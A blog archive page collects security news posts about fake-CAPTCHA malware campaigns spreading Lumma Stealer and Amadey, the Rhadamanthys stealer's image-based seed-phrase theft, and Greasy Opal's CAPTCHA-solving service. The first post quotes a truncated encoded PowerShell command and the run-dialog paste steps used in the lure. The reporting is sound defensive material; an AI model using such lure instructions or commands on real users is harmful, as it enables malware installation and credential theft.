Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label CAPTCHA. Show all posts
Online Security
CAPTCHA Lumma Stealer Malicious Campaign malware Online Security

Malware Campaign Expands Its Use of Fraudulent CAPTCHAs

 

Attackers are increasingly spreading malware using a unique method: a fake CAPTCHA as the initial infection vector. Researchers from multiple companies reported on this campaign in August and September. The attackers, who mainly targeted gamers, first transmitted the Lumma stealer to victims via websites hosting cracked games.

The recent adware research shows that this malicious CAPTCHA is spreading through a wide range of online resources unrelated to gaming, including adult sites, file-sharing services, betting platforms, anime resources, and web apps that monetise traffic. This shows that the distribution network is being expanded to reach a larger pool of victims. Furthermore, we discovered that the CAPTCHA distributes both Lumma and the Amadey Trojan. 

Malicious CAPTCHA

It's critical to comprehend how the attackers and their distribution network function in order to prevent falling for their tricks. Legitimate, non-malicious offers are also included in the ad network that pushes pages with the malicious CAPTCHA. 

It works as follows: the user is redirected to additional resources when they click anywhere on a page that uses the ad module. As is common with adware, the majority of redirects take users to websites that advertise security software, ad blockers, and similar products. Sometimes, though, the victim is directed to a page that contains the malicious CAPTCHA. 

Unlike genuine CAPTCHAs, which are intended to safeguard websites from bots, this copycat promotes illicit resources. As with the previous stage, the victim does not always come across malware. For example, the CAPTCHA on one of the sites invites the visitor to scan a QR code, which leads to a betting site. 

The Trojans are distributed using CAPTCHAs that provide instructions. By clicking the "I'm not a robot" button, you can copy the powershell line.exe -eC bQBzAGgAdABhA <...>MAIgA= to the clipboard and displays the following "verification steps": 

  • To open the Run dialogue box, use Win + R. 
  • Subsequently, paste the clipboard line into the text field using CTRL + V. 
  • Finally, press Enter to execute the code. 

Payload: Amadey trojan

Researchers have discovered that the same effort is also propagating the Amadey Trojan. Since 2018, Amadey has been the subject of multiple security reports. In short, the Trojan downloads multiple modules that steal credentials from major browsers and Virtual Network Computing (VNC) systems. 

It also detects cryptocurrency wallet addresses in the clipboard and replaces them with those owned by the attackers. One of the modules can also capture screenshots. In some cases, Amadey downloads the Remcos remote access tool to the victim's device, allowing the attackers complete control over it. 

From September 22 to October 14, 2024, over 140,000 users encountered ad scripts. According to Kaspersky's telemetry data, more than 20,000 of these 140,000 users were routed to infected sites, where some encountered a phoney update notification or a fake CAPTCHA. Users from Brazil, Spain, Italy, and Russia were the most commonly affected.
Read more »
Rhadamanthys malware
AI CAPTCHA cryptocurrency wallet Financial Data malware Rhadamanthys malware

AI-Powered Malware Targets Crypto Wallets with Image Scans

 



A new variant of the Rhadamanthys information stealer malware has been identified, which now poses a further threat to cryptocurrency users by adding AI to seed phrase recognition. The bad guys behind the malware were not enough in themselves, but when added into this malware came another functionality that includes optical character recognition or OCR scans for images and seed phrase recognition-the total key information needed to access cryptocurrency wallets.

According to Recorded Future's Insikt Group, Rhadamanthys malware now can scan for seed phrase images stored inside of infected devices in order to extract this information and yet further exploitation.

So, basically this means their wallets may now get hacked through this malware because their seed phrases are stored as images and not as text.


Evolution of Rhadamanthys

First discovered in 2022, Rhadamanthys has proven to be one of the most dangerous information-stealing malware available today that works under the MaaS model. It is a type of service allowing cyber criminals to rent their malware to other cyber criminals for a subscription fee of around $250 per month. The malware lets the attackers steal really sensitive information, including system details, credentials, browser passwords, and cryptocurrency wallet data.

The malware author, known as "kingcrete," continues to publish new versions through Telegram and Jabber despite the ban on underground forums like Exploit and XSS, in which mainly users from Russia and the former Soviet Union were targeted.

The last one, Rhadamanthys 0.7.0, which was published in June 2024, is a big improvement from the structural point of view. The malware is now equipped with AI-powered recognition of cryptocurrency wallet seed phrases by image. This has made the malware look like a very effective tool in the hands of hackers. Client and server-side frameworks were fully rewritten, making them fast and stable. Additionally, the malware now has the strength of 30 wallet-cracking algorithms and enhanced capabilities of extracting information from PDF and saved phrases.

Rhadamanthys also has a plugin system allowing it to further enhance its operations through keylogging ability, cryptocurrency clipping ability- wallet address alteration, and reverse proxy setups. The foregoing tools make it flexible for hackers to snoop for secrets in a stealthy manner.


Higher Risks for Crypto Users in Term of Security

Rhadamanthys is a crucial threat for anyone involved with cryptocurrencies, as the attackers are targeting wallet information stored in browsers, PDFs, and images. The worrying attack with AI at extracting seed phrases from images indicates attackers are always inventing ways to conquer security measures.

This evolution demands better security practices at the individual and organization level, particularly with regards to cryptocurrencies. Even for simple practices, like never storing sensitive data within an image or some other file without proper security, would have prevented this malware from happening.


Broader Implications and Related Threats

Rhdimanthys' evolving development is part of a larger evolutionary progress in malware evolution. Some other related kinds of stealer malware, such as Lumma and WhiteSnake, have also released updates recently that would further provide additional functionalities in extracting sensitive information. For instance, the Lumma stealer bypasses new security features implemented in newly designed browsers, whereas WhiteSnake stealer has been updated to obtain credit card information stored within web browsers.

These persistent updates on stealer malware are a reflection of the fact that cyber threats are becoming more mature. Also, other attacks, such as the ClickFix campaign, are deceiving users into running malicious code masqueraded as CAPTCHA verification systems.

With cybercrime operatives becoming more sophisticated and their tools being perfected day by day, there has never been such a challenge for online security. The user needs to be on the alert while getting to know what threats have risen in cyberspace to prevent misuse of personal and financial data.


Read more »
Web
Browsing CAPTCHA Internet Lumma Stealer malware Web

Lumma Stealer Uses Fake CAPTCHA Pages to Distribute Malware

Lumma Stealer Uses Fake CAPTCHA Pages to Distribute Malware

Cyber security professionals are warning about a new cyber-attack vector: Lumma Stealer malware that uses fake CAPTCHA tests to spread malware on Windows devices. Users are advised to maintain caution when filling out a CAPTCHA challenge. 

“We have identified more active malicious sites spreading the Lumma Stealer. It's important to note that while this technique is currently being used to distribute Lumma Stealer, it could potentially be leveraged to deliver any type of malicious malware to unsuspecting users,” say experts from Cloud SEK.

How does CAPTCHA work?

A CAPTCHA traditionally works as a security checkpoint, making sure that online activities are started by humans and not automated bots. However, hackers are misusing the CAPTCHA for malicious gains, creating a fake CAPTCHA challenge. When a user completes it, the CAPTCHA deploys a series of malicious commands.

The fake CAPTCHA tests ask request users to press a sequence that many users think is harmless. But, doing so starts the download and activation of a Power Shell script that installs the Lumma Stealer malware.

Cybersecurity experts from Palo Alto Networks believe Lumma Stealer is an information-stealing malware used for stealing data- passwords, cookies, and cryptocurrency wallet credentials. If the malware is present on a compromised device, it exposes users to major risks of financial fraud, cyberattacks, and identity theft.

The malicious CAPTCHA has massive scale distribution, experts at Hudson Rock noticed that if a user visits compromised websites, it automatically copies the malicious script to a user's clipboard. This can increase the chances of automatic triggering of an attack.

Additionally, experts have noticed an increase in this kind of attack, meaning cybercriminals are improving and implementing their attack tactics. These fake CAPTCHA tests can be spread via phishing emails and messages, which makes them a threat.

Users can follow these steps to minimize the risks of fake CAPTCHA threats

Check URLs: Make sure the site is authentic before interacting with any CAPTCHA.

Keep systems updated: Updated OS, browsers, and antivirus software can increase your security.

Stay cautious with CAPTCHA: Stay safe from any CAPTCHA test that requests any action beyond selecting images and text input.

Follow safe browsing hygiene: Do not click links or attachments from unknown messages or emails.

Read more »
Technology
CAPTCHA Greasy Opal Technology

16 Years of Cybercrime: The Story of Greasy Opal’s CAPTCHA Solver

16 Years of Cybercrime: The Story of Greasy Opal’s CAPTCHA Solver

Certain tools and techniques have been persistent, continually adapting to new challenges and threats. One such tool is the CAPTCHA solver developed by Greasy Opal, a name that has become synonymous with cybercrime over the past 16 years. This blog delves into the history, impact, and ongoing relevance of Greasy Opal’s CAPTCHA solver in the cybercriminal ecosystem.

The Genesis of Greasy Opal’s CAPTCHA Solver

CAPTCHAs, or Completely Automated Public Turing tests to tell Computers and Humans Apart, were introduced as a security measure to prevent automated bots from accessing websites and online services. However, as with any security measure, some sought to circumvent it. Enter Greasy Opal, a developer who saw an opportunity in the burgeoning field of CAPTCHA-solving technology.

Greasy Opal’s tool, which started as a simple script, quickly evolved into a sophisticated piece of software capable of solving CAPTCHAs with high accuracy. The tool’s effectiveness made it a favorite among cybercriminals, who used it to automate various illicit activities, from spamming and social media promotion to black hat SEO and account takeovers.

The Mechanics of CAPTCHA Solving

At its core, a CAPTCHA solver mimics human behavior to bypass the security checks designed to differentiate between humans and bots. Greasy Opal’s solver employs advanced machine learning algorithms and image recognition techniques to decode the distorted text and images commonly used in CAPTCHAs. The tool’s ability to solve CAPTCHAs at scale has made it an invaluable asset for cybercriminals looking to automate their operations.

The solver is available in free and paid versions, offering higher accuracy and faster recognition times. This tiered approach has allowed Greasy Opal to monetize the tool while maintaining a veneer of legitimacy by paying taxes and operating as a seemingly lawful business.

The Impact on Cybercrime

The widespread use of Greasy Opal’s CAPTCHA solver has had a profound impact on the cybercriminal landscape. By automating the process of solving CAPTCHAs, the tool has lowered the barrier to entry for less-skilled threat actors, enabling them to carry out large-scale attacks with minimal effort. This democratization of cybercrime has led to an increase in the volume and sophistication of attacks targeting various sectors, including e-commerce, social media, and government services.

Prominent entities such as Amazon, Apple, and Facebook have been targeted using Greasy Opal’s tool, highlighting the far-reaching implications of this technology. Researchers at Arkose Labs have acknowledged the tool’s efficiency, noting its role in facilitating a wide range of cybercriminal activities.

Ethical and Legal Considerations

Despite its clear association with illegal activities, Greasy Opal continues to operate under a legitimate guise. The developer’s decision to pay taxes and comply with certain legal requirements has allowed them to avoid significant legal repercussions. However, this raises important ethical questions about the responsibility of developers in the cybersecurity space.

The case of Greasy Opal underscores the need for stricter regulations and enforcement mechanisms to curb the misuse of technology for criminal purposes. It also highlights the importance of ongoing research and innovation in developing more robust security measures to counteract such threats.

The Future of CAPTCHA Solving

As cybersecurity measures continue to evolve, so too will the techniques used to bypass them. Greasy Opal’s CAPTCHA solver is a testament to the enduring cat-and-mouse game between security professionals and cybercriminals. While CAPTCHAs remain a widely used security measure, their effectiveness is increasingly being called into question as tools like Greasy Opal’s become more advanced.

Read more »
Subscribe to: Posts (Atom)